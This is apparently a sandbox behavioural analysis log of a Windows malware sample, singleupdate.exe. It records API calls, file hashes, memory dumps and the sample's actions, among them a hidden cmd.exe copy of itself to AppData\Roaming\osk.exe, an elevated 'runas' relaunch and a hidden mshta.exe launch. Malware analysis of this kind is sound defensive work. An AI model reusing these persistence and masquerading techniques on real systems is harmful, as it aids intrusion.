Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x75c152c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x75c16560	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x75bed610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x75bee3e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x75bedb10	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x75c15800	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x75c161a0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x75c16400	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x75be3200	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x75c16610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x75c167b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x75bd60b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarI4FromStr, address_out = 0x75bd6ec0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromStr, address_out = 0x75be3010	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR8FromStr, address_out = 0x75be3630	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromStr, address_out = 0x75bd8b90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyFromStr, address_out = 0x75bc2d90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBoolFromStr, address_out = 0x75bd48f0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75bd7f50	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75bd89c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75bd48a0	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0	249	Fn
Map	-	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ	249	Fn

Driver (1)

Operation	Driver	Additional Information	Success	Count	Logfile
Control	System Paging File	control_code = 0x900c0		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = SysTreeView32, wndproc_parameter = 0		1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = 0, result_out = 4		1	Fn

System (952)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS	249	Fn
Get Cursor	x_out = 846, y_out = 117	699	Fn
Get Time	type = Local Time, time = 2019-04-12 11:16:38 (Local Time)	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:17:02 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 17188009373	1	Fn
Get Info	type = Operating System	1	Fn

Environment (3)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe		1	Fn

Process #2: cmd.exe

Information	Value
ID	#2
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe"
Initial Working Directory	C:\WINDOWS\system32\
Monitor	Start Time: 00:02:49, Reason: Child Process
Unmonitor	End Time: 00:03:02, Reason: Self Terminated
Monitor Duration	00:00:13

OS Process Information

Information	Value
PID	0xa8c
Parent PID	0xfa0 (c:\users\fd1hvy\desktop\singleupdate.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 714 0x 824

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
cmd.exe	0x00C00000	0x00C58FFF	Process Termination	-	32-bit	-			... Region Actions Download Dump

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\FD1HVy\Desktop\singleupdate.exe	746.00 KB	MD5: 545c7d2d0c5b7686dd4a2012399148a9 SHA1: a481c02f8cb988279431aae959b2cbc2638443cb SHA256: 3e4f8a1598f9dd834766d5184c3347947a201ff9a559fa275f048b14267d7f8a SSDeep: 12288:S9CZOU8dEgeDiSrnR32F8RB1laLv6GcxJ5Wj/o9ZPlThRqdbMSz+NHH+gD1axZF8:jZOU8dEgeDDrnR3losxyU9ZNThSwNHHr		... File Actions Show Properties Download

Host Behavior

File (27)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\FD1HVy\Desktop\singleupdate.exe	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Get Info	C:\WINDOWS\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	C:\Users\FD1HVy\Desktop\singleupdate.exe	type = file_attributes	1	Fn
Get Info	-	type = file_type	1	Fn
Get Info	C:\Users\FD1HVy\AppData\Roaming\osk.exe	type = file_attributes	2	Fn
Get Info	C:\Users\FD1HVy\AppData\Roaming\osk.exe	type = file_attributes	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	9	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	-	-	2	Fn
Copy	C:\Users\FD1HVy\AppData\Roaming\osk.exe	source_filename = C:\Users\FD1HVy\Desktop\singleupdate.exe	1	Fn
Read	-	size = 512, size_out = 512	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 27	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 152, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Get Info	c:\windows\syswow64\cmd.exe	type = PROCESS_PAGE_PRIORITY		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (11)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #5: singleupdate.exe

2709

Information	Value
ID	#5
File Name	c:\users\fd1hvy\desktop\singleupdate.exe
Command Line	"C:\Users\FD1HVy\Desktop\singleupdate.exe" runas
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:03:03, Reason: Child Process
Unmonitor	End Time: 00:03:34, Reason: Self Terminated
Monitor Duration	00:00:30

OS Process Information

Information	Value
PID	0xe64
Parent PID	0xfa0 (c:\users\fd1hvy\desktop\singleupdate.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 7F0 0x 9E0 0x E90 0x F28 0x ED0 0x E98 0x 4A8 0x 4A4

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
singleupdate.exe	0x00400000	0x004BFFFF	Marked Writable	-	32-bit	-	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00401110	... Region Actions Download Dump Go to AV Match
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040EB38, 0x0040F130	... Region Actions Download Dump Go to AV Match
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040B764	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00417D3C	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00410838	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00413074	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042A5C8	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042B67C, 0x0042CC58	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00423564, 0x00429864	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00414000	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00420000, 0x0041FA70, ...	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00415904	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00416000	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00426B84	... Region Actions Download Dump
singleupdate.exe	0x00400000	0x004BFFFF	Process Termination	-	32-bit	-	... Region Actions Download Dump

Host Behavior

COM (1)

Operation	Class	Interface	Additional Information	Success	Count	Logfile
Create	BCDE0395-E52F-467C-8E3D-C4579291692E	A95664D2-9614-4F35-A746-DE8DB63617E6	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER		1	Fn

File (570)

Operation	Filename	Additional Information	Count	Logfile
Create	g	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ	249	Fn
Create	-	share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE	1	Fn
Get Info	System Paging File	type = size	249	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	68	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Delete	C:\Users\FD1HVy\AppData\Roaming\osk.exe	-	1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\shwlwook	-	1	Fn

Process (3)

Operation	Process	Additional Information	Count	Logfile
Create	C:\WINDOWS\system32\cmd.exe	os_pid = 0xfb4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Users\FD1HVy\AppData\Roaming\osk.exe	show_window = SW_SHOWNORMAL	1	Fn
Create	mshta.exe	os_pid = 0xfe4, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn

Module (772)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x74ea0000	1	Fn
Load	kernel32	base_address = 0x75e90000	1	Fn
Load	api-ms-win-core-string-l1-1-0	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-datetime-l1-1-1	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-localization-obsolete-l1-2-0	base_address = 0x74ea0000	1	Fn
Load	oleaut32.dll	base_address = 0x75bb0000	2	Fn
Load	advapi32.dll	base_address = 0x761b0000	2	Fn
Load	user32.dll	base_address = 0x74b70000	2	Fn
Load	kernel32.dll	base_address = 0x75e90000	4	Fn
Load	wininet.dll	base_address = 0x73310000	1	Fn
Load	shell32.dll	base_address = 0x76480000	3	Fn
Load	C:\Users\FD1HVy\Desktop\singleupdate.ENU	base_address = 0x0	1	Fn
Load	C:\Users\FD1HVy\Desktop\singleupdate.EN	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77bb0000	7	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x761b0000	2	Fn
Get Handle	c:\users\fd1hvy\desktop\singleupdate.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x75bb0000	1	Fn
Get Filename	-	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261	2	Fn
Get Filename	c:\users\fd1hvy\desktop\singleupdate.exe	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261	1	Fn
Get Filename	C:\Users\FD1HVy\Desktop\singleupdate.EN	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 522	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsAlloc, address_out = 0x74f9bea0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsSetValue, address_out = 0x74f92550	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = InitializeCriticalSectionEx, address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsGetValue, address_out = 0x74f870c0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCMapStringEx, address_out = 0x74f7ed00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ea4280	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75ea4ae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75ea4b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75ea4b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75ea4b40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75efebc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitOnceExecuteOnce, address_out = 0x74f95550	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75efeb20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75efeb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75efeb80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75ea6d30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77bfd7c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77bfb740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75ea6d70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77bfc0b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77bfbe10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77c22b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77c152f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75ea4510	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x74f9e260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75ea0db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleEx, address_out = 0x75ea43d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandle, address_out = 0x75eff110	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeConditionVariable, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeConditionVariable, address_out = 0x77c88c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeAllConditionVariable, address_out = 0x77c18a90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableCS, address_out = 0x7500fca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSRWLock, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x77bf58e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableSRW, address_out = 0x7500fcf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWork, address_out = 0x75ea6db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SubmitThreadpoolWork, address_out = 0x77bfeb00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWork, address_out = 0x77bfed50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ea7050	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ea7190	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ea7480	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = CompareStringEx, address_out = 0x74f62c20	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = EnumSystemLocalesEx, address_out = 0x74f63a60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetDateFormatEx, address_out = 0x74fd9b40	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetLocaleInfoEx, address_out = 0x74f8f170	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetTimeFormatEx, address_out = 0x74fd9e10	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetUserDefaultLocaleName, address_out = 0x74f94220	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = IsValidLocaleName, address_out = 0x74f8ed60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCIDToLocaleName, address_out = 0x74f8da50	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LocaleNameToLCID, address_out = 0x74f6bac0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = memcpy, address_out = 0x77c27b00	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysFreeString, address_out = 0x75bcb920	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysReAllocStringLen, address_out = 0x75bd1500	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysAllocStringLen, address_out = 0x75bcb7e0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExA, address_out = 0x761cf020	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExA, address_out = 0x761cf210	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x761ced60	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardType, address_out = 0x74be8d80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74ba3160	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadStringA, address_out = 0x74b8d7b0	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxA, address_out = 0x74bdd740	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextA, address_out = 0x74b8bf60	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75ea4ca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75ea6760	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75ea69d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75ea6970	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75efdd50	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75ea5da0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75ea8820	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualQuery, address_out = 0x75ea6a70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75ea6b10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75ea5c40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75ea6c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x75ea6c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExA, address_out = 0x75ea5aa0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetThreadLocale, address_out = 0x75ea5600	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoA, address_out = 0x75ee28e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75ea51b0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75ea50b0	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x75ea5070	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoA, address_out = 0x75ea5020	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75ea4cb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75ea4c40	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileA, address_out = 0x75efedb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75efed70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75ea3cb0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75ea46b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75eff180	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75ea68d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75ea7c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75ea5e20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75ea5330	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75ea6870	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75ea6850	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75ea5b20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74b9f900	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SystemParametersInfoW, address_out = 0x74b9f210	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageA, address_out = 0x74b887a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x74b9ddc0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetLastInputInfo, address_out = 0x74b8bd10	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageA, address_out = 0x74b8fd80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextW, address_out = 0x74ba1130	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffW, address_out = 0x74b934a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffA, address_out = 0x74be75b0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperBuffA, address_out = 0x74be7650	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemA, address_out = 0x74bdf020	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WinExec, address_out = 0x75ee2b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75efeca0	1	Fn
